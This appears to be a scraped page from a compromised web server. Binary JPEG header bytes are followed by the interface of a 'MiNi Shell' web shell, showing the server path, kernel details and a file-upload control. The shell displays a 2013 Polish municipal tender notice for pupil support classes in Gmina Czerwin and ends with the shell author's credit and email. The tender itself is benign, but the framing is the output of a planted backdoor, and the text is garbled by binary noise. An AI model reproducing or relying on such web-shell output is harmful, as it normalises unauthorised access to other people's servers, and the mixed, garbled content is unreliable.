JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/391712-N-2013.html

<p class="kh_header"><b>Czerwin: Organizacja i przeprowadzenie zajęć dydaktyczno-wyrównawczych i zajęć pozalekcyjnych oraz wsparcie pedagoga, wsparcie psychologa , przeprowadzenie warsztatów osobistego rozwoju dla uczniów/uczennic uczęszczających do Szkół Podstawowych i Publicznego Gimnazjum na terenie Gminy Czerwin, realizowanych w ramach projektu pn.Równamy szanse - program wyrównania szans edukacyjnych uczniów w Gminie Czerwin</b><br>
<b>Numer ogłoszenia: 391712 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwin , Plac Tysiąclecia 1, 07-407 Czerwin, woj. mazowieckie, tel. 29 7614593, faks 29 7619217.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie zajęć dydaktyczno-wyrównawczych i zajęć pozalekcyjnych oraz wsparcie pedagoga, wsparcie psychologa , przeprowadzenie warsztatów osobistego rozwoju dla uczniów/uczennic uczęszczających do Szkół Podstawowych i Publicznego Gimnazjum na terenie Gminy Czerwin, realizowanych w ramach projektu pn.Równamy szanse - program wyrównania szans edukacyjnych uczniów w Gminie Czerwin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i przeprowadzenie zajęć dydaktyczno-wyrównawczych i zajęć pozalekcyjnych oraz wsparcie pedagoga, wsparcie psychologa, przeprowadzenie warsztatów osobistego rozwoju dla uczniów (uczennic) uczęszczających do Szkół Podstawowych i Publicznego Gimnazjum na terenie Gminy Czerwin, realizowanych w ramach projektu pn.Równamy szanse - program wyrównania szans edukacyjnych uczniów w Gminie Czerwin- Program Operacyjny Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej, jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic, w jakości usług edukacyjnych - projekty konkursowe.
2.	Zamówienie realizowane będzie w formie zajęć w zakresach tematycznych:
Zadanie 1: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z matematyki w  Szkole Podstawowej w Czerwinie - 37 godz.
Zadanie 2: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z przyrody w Szkole Podstawowej w Czerwinie- 37 godz.
Zadanie 3: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z języka polskiego i w Szkole Podstawowej w Czerwinie- 37 godz. 
Zadanie 4: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z informatyki w Szkole Podstawowej w Czerwinie- 37 godz. 
Zadanie 5: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z języka angielskiego w  Szkole Podstawowej w Czerwinie -37 godz. 
Zadanie 6: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z matematyki w Szkole Podstawowej w Piskach- 37 godz.
Zadanie 7: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z przyrody w Szkole Podstawowej w Piskach - 37 godz.
Zadanie 8: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z języka polskiego i w Szkole Podstawowej w Piskach- 37 godz.
Zadanie 9: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z informatyki w Szkole Podstawowej w Piskach- 37 godz. 
Zadanie 10: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z języka angielskiego w Szkole Podstawowej w Piskach -37 godz. 
Zadanie 11: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z matematyki w gimnazjum w  Czerwinie - 37 godz,
Zadanie 12: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z fizyki w gimnazjum w Czerwinie - 37 godz,
Zadanie 13: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z chemii w gimnazjum w Czerwinie - 37 godz,
Zadanie 14: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z języka angielskiego w gimnazjum w Czerwinie - 37 godz,
Zadanie 15: Organizacja i przeprowadzenie zajęć dydaktyczno - wyrównawczych z biologii w gimnazjum w Czerwinie  - 37 godz,
Zadanie 16: Organizacja i przeprowadzenie dodatkowych zajęć pozalekcyjnych z następujących tematów:
a)	Przedsiębiorczość:  80h -warsztaty grupowe organizowane dla uczniów gimnazjum mające na celu: zrozumienie roli pracy w życiu człowieka, kształtowanie umiejętności określania własnej hierarchii potrzeb, zapoznanie z czynnikami mającymi wpływ na proces gospodarowania, kształtowanie umiejętności zespołowego rozwiązywania  problemów
b)	Moja mała ojczyzna: historia mojej miejscowości - 80 h,- zajęcia grupowe skierowane do uczniów Szkół Podstawowych i Gimnazjum mające na celu: organizowanie działań umożliwiających poznawanie wielowymiarowości człowieka,(postrzegam, myślę, czuję działam)oraz wzbudzenie zainteresowania obrazem, ilustracją, tekstem a także poznanie ,stosowanie, tworzenie symboli i znaków.
c)	ICT: 80h- zajęcia grupowe skierowane do uczniów szkół podstawowych mające na celu: rozwój umiejętności w zakresie stosowania nowych technologii informatycznych oraz zapoznanie z metodami uczenia się z wykorzystaniem ICT.
Zadanie 17: Wsparcie pedagoga - 50 h.
a)	Indywidualne konsultacje dla uczniów gimnazjum i szkół podstawowych.
Zadanie 18: Wsparcie psychologa - 50h.
a)	Indywidualne konsultacje dla uczniów gimnazjum i szkół podstawowych.
Zadanie 19: Wsparcie doradcy edukacyjno- zawodowego dla uczniów gimnazjum - 60h .
a)	grupowe zajęcia dla uczniów gimnazjum ukierunkowane na zapoznanie się z wymaganiami zawodowymi i warunkami pracy, pomoc w tworzeniu wizji swojej przyszłości edukacyjno- zawodowej, przygotowanie do trafnego wyboru zawodu i dalszego kształcenia.
b)	opracowanie programu zajęć. ( 20 godz.)
Zadanie 20: Warsztaty osobistego rozwoju dla uczniów gimnazjum - 90h.
a)	grupowe zajęcia dla uczniów gimnazjum ukierunkowane na rozwój kompetencji społecznych mające na celu pomoc w planowaniu ścieżek kariery zawodowej oraz rozwój kompetencji kluczowych.
b)	opracowanie programu zajęć ( 15 godz.)
3.	Wsparciem w ramach projektu planuje się objąć 185 uczniów. Liczebność grup uczniów biorących udział w zajęciach uzależniona jest od rodzaju zajęć i wynosić będzie ok. 15 osób w grupie. (Rozporządzenie MENiS z dnia 7 stycznia 2003r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych  przedszkolach, szkołach i placówkach).
4.	W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie zajęć dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na zajęcia oraz w konsekwencji powyższego prawo zmniejszenia liczby grup.
5.	Miejsce realizacji przedmiotu zamówienia: 
a)	Publiczne Gimnazjum w Czerwinie, ul. Piastowska 23A, 07-407 Czerwin.
b)	Szkoła Podstawowa w Czerwinie ul. Szkolna 5, 07-407 Czerwin .
c)	Szkoła Podstawowa w Piskach ul. Słowackiego 22, 07-407 Czerwin.
6.	Zamawiający wymaga aby oferowane przez Wykonawcę usługi szkoleniowe w ramach niniejszego zamówienia  odpowiadały - spełniały następujące wymagania ogólne:
a)	jednostka 1(h) godzina w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut.
b)	rekrutację osób do projektu prowadzi Zamawiający. 
c)	zajęcia prowadzone będą zgodnie z terminem wskazanym dla ich realizacji.
d)	zastosowane metody nauczania muszą uwzględniać indywidualne podejście do każdego z uczestników.
e)	warunki pracy osób szkolących się w trakcie trwania zajęć będą zgodne z przepisami bezpieczeństwa i higieny pracy.
f)	opracowanie programów zajęć pozalekcyjnych, na podstawie dokumentów udostępnionych przez Zamawiającego, w szczególności na podstawie treści wniosku o dofinansowanie projektu pn. Równamy szanse program wyrównywania szans edukacyjnych uczniów w Gminie Czerwin.
g)	organizację i przeprowadzenie zajęć pozalekcyjnych na podstawie zatwierdzonych przez Zamawiającego programów zajęć z wykorzystaniem materiałów dydaktycznych i pomocy udostępnionych przez Zamawiającego.
h)	realizację ustalonego programu zajęć dydaktycznych według harmonogramu opracowanego przez Zamawiającego.
i)	prowadzenie dokumentacji wymaganej podczas realizacji projektu zgodnie z obowiązującymi wytycznymi dla realizacji projektów z POKL.
j)	monitorowanie przebiegu realizacji zajęć, w tym przeprowadzenie koniecznych badań osiąganych efektów oraz frekwencji uczestników.
k)	współpracę z Zamawiającym oraz wyznaczonym przez Zamawiającego zespołem zarządzającym w zakresie prawidłowej realizacji projektu .
l)	dbałość o bezpieczeństwo uczniów na zajęciach, poprzez: zapewnienie im właściwej opieki, dokonywanie przeglądu sprzętu wykorzystywanego w ramach zajęć, opieki nad uczniami w trakcie przerw przed, po  i w trakcie zajęć.
m)	aktywnie uczestniczenie w procesie monitoringu realizacji projektu: wypełnianie odpowiednich ankiet oraz zestawień.
n)	Wykonawca zapewni kadrę dydaktyczną posiadającą kwalifikacje i umiejętności wykładowców adekwatne do zakresu programowego prowadzonych przez nich zajęć oraz czynne uczestnictwo w procesie dydaktycznym wszystkich wykładowców
(instruktorów) wyszczególnionych w ofercie przetargowej, tj. praktyczne prowadzenie zajęć, co będzie miało swoje odzwierciedlenie w dzienniku zajęć .
o)	Wymieniona w Załączniku nr 4 do oferty kadra nie może bez zgody Zamawiającego być zmieniona przed i w trakcie realizacji zadań.
7.	Zamawiający wymaga osobistego wykonania przedmiotu zamówienia przez Wykonawcę, bez dalszego zlecania podwykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca obowiązany jest:
- posiadać doświadczenie w organizacji i przeprowadzeniu szkoleń lub kursów w wymiarze co najmniej 200 godzin wykładowych, w tym 100 godzin w ramach projektu współfinansowanego ze środków UE (1 godzina wykładowa = 45 minut) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, na rzecz co najmniej jednego podmiotu potwierdzone referencjami.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca obowiązany jest:
dysponować osobami, które będą uczestniczyć w wykonywaniu danego zadania opisanego w przedmiocie zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do wykonywania zamówienia, tj. osobami, które posiadają kwalifikacje zawodowe, doświadczenie  i wykształcenie niezbędne do realizacji zakresu zajęć przedstawionych w przedmiocie zamówienia, w tym:
 - dla realizacji zadania 1 -15:
minimum 5-letnie doświadczenie w pracy nauczyciela w szkole podstawowej lub gimnazjum, są nauczycielami pracującymi w zawodzie, posiadają stopień nauczyciela: kontraktowego/mianowanego/ dyplomowanego, zgodnie z Ustawą - Karta Nauczyciela z 26 stycznia 1982 r. (tekst jedn. Dz. U. z 2006, nr 97, poz. 674 z późn. zm.); są specjalistami w danej dziedzinie. 
- dla realizacji zadania 16:          
a) Warsztaty z przedsiębiorczości: stopień nauczyciela kontraktowego/ mianowanego/ dyplomowanego, zgodnie z Ustawą Karta Nauczyciela z 26 stycznia 1982 r. (Dz. U. z 2006, nr 97, poz. 674 z późn. zm.) przygotowanie z zakresu edukacji ekonomicznej i finansowej  w gimnazjum potwierdzone stosownym dokumentem lub doświadczenie w prowadzeniu zajęć z w.w tematu.
b) Moja mała ojczyzna: Stopień nauczyciela kontraktowego, mianowanego, dyplomowanego, zgodnie z Ustawą Karta Nauczyciela z 26 stycznia 1982 r. (Dz.U. z 2006, nr 97, poz. 674 z późn. zm.).
c)   ICT: stopień nauczyciela kontraktowego, mianowanego, dyplomowanego, zgodnie z Ustawą Karta Nauczyciela z 26 stycznia 1982 r. (Dz.U. z 2006, nr 97, poz. 674 z późn. zm.);
- dla realizacji zadania 17: 
Pedagog: minimum 5-letnie doświadczenie w pracy nauczyciela w szkole podstawowej lub gimnazjum, są nauczycielami pracującymi w zawodzie, posiadają stopień nauczyciela: kontraktowego, mianowanego, dyplomowanego, zgodnie z Ustawą Karta Nauczyciela z 26 stycznia 1982 r. (Dz.U. z 2006, nr 97, poz. 674 z późn. zm.); jest specjalistą w danej dziedzinie. 
- dla realizacji zadania 18: 
Psycholog: ukończone studia wyższe magisterskie na kierunku psychologia.
- dla realizacji zadania 19 i 20: 
a) Stopień nauczyciela kontraktowego, mianowanego, dyplomowanego, zgodnie 
z Ustawą Karta Nauczyciela z 26 stycznia 1982 r. (Dz.U. z 2006, nr 97, poz. 674 
z późn. zm.) doświadczenie w prowadzeniu zajęć motywujących min 100 godz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Potencjał kadrowy - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy:
a)	Zaistnienia omyłki pisarskiej lub rachunkowej. 
b)	Zaistnienia siły wyższej w rozumieniu przepisów prawa cywilnego  (np. powódź, pożar, niepokoje społeczne na terenie realizowanego zamówienia, strajki, blokady dróg, zamachy terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. 
c)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy. 
d)	Wystąpienia innych niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, których nie można było przewidzieć przy zachowaniu należytej staranności, które mają wpływ na terminy realizacji zamówienia.
e)	zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
f)	zmian liczebnych grup szkoleniowych, 
g)	Zmiana okresu realizacji umowy jest możliwa w przypadku zmian w projekcie;
h)	Zmniejszenie wartości umowy jest możliwe w przypadku zmian w projekcie;
i)	W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czerwin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Czerwin, Plac Tysiąclecia1, 07-407 Czerwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 10:45, miejsce: Gmina Czerwin, Plac Tysiąclecia1, 07-407 Czerwin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program realizowany w ramach projektu pn. Równamy szanse - program wyrównania szans edukacyjnych uczniów w Gminie Czerwin.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com